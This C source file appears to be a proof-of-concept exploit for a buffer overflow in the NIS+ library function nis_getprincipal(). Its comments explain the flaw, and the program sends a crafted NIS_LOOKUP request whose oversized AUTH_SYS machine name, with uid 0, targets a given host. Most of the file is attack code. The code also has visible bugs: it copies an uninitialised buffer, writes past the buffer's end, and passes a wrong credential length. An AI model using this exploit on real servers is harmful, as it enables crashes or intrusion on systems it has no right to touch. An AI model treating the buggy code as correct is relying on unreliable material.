        /* will overflow pname.. oa_flavor has to be AUTH_SYS..       */
        /* reqstp->rq_clntcred is the auth.. in getprincipal it does: */
        /* au = (struct authsys_parms *)(reqpstr->rq_clntcred).       */
        /* it overflows in: sprintf(pname, "%s", au->aup_machname);   */
        /* au->aup_uid has to be 0                                    */
        /* the au and reqpstr is passed to nis_lookup_svc..           */
        /* which is passed to nis_prog_svc()                          */
        /* MUST be compiled with TDRPC                                */

/* reqstp.. can't be passed by the client.. */
/* the rq_clntcred can be passed by the client..  so I don't */
/* think that'll be a problem */
/* nis_getprincipal() is has an overflow in the libnsl.. it's internal */
/* that's called by nis_lookup_svc().. the function for the NIS_LOOKUP */
/* request.                                                            */

#include <stdio.h>
#include <stdlib.h>
#include <memory.h>

#include "nis.h"
#include "nis_clnt.h"

/* Default timeout can be changed using clnt_control() */
static struct timeval TIMEOUT = { 25, 0 };

nis_result *
nis_lookup_3(ns_request *argp, CLIENT *clnt)
{
	static nis_result clnt_res;

	memset((char *)&clnt_res, 0, sizeof(clnt_res));
	if (clnt_call(clnt, NIS_LOOKUP, (xdrproc_t) xdr_ns_request, argp, (xdrproc_t) xdr_nis_result, &clnt_res, TIMEOUT) != RPC_SUCCESS) {
		return (NULL);
	}
	return (&clnt_res);
}

void main(int argc, char **argv)
{
  int i;
  struct authunix_parms *au;
  CLIENT *cl;

  char buf[2048];

  struct ns_request nsr;
  
  if (argc < 2) {
     printf(" Usage: %s <host>\n", argv[0]);
     exit(1);
  }

  if ((cl = clnt_create(argv[1], NIS_PROG, NIS_VERSION, "tcp")) == NULL) {
     clnt_pcreateerror(argv[1]);
     printf("Try using nis_clnt1 (nis_clnt1.c) instead.\n");
     exit(1);
  }

  au = (struct authunix_parms *)malloc(sizeof(struct authunix_parms));
  if (au == NULL) { perror("malloc"); exit(1); }

  au->aup_machname = strdup(buf);
  au->aup_uid = au->aup_gid = 0;

  cl->cl_auth = authunix_create_default(); /* IMPORTRANT */

  for (i = 0; i < sizeof(buf); i++) buf[i] = 'A';
  buf[++i] = '\0';

  /* Set up arguments. */
  bzero(&nsr, sizeof(nsr));

/*  cl->cl_auth.aup_time = time(NULL);    */
/*  cl->cl_auth.aup_len = ?               */ 
/*  cl->cl_auth.au.aup_gids = (gid_t *)0; */

  cl->cl_auth->ah_cred.oa_flavor = 1;
  cl->cl_auth->ah_cred.oa_base = (caddr_t)au;
  cl->cl_auth->ah_cred.oa_length = sizeof(au);

  cl->cl_auth->ah_verf.oa_flavor = 1;
  cl->cl_auth->ah_verf.oa_base = (caddr_t)au;
  cl->cl_auth->ah_verf.oa_length = sizeof(au);

  nsr.ns_name = strdup("shok");
  nsr.ns_object.ns_object_val = NULL;

  nis_lookup_3(&nsr, cl);

  printf("All finished.\n");

}
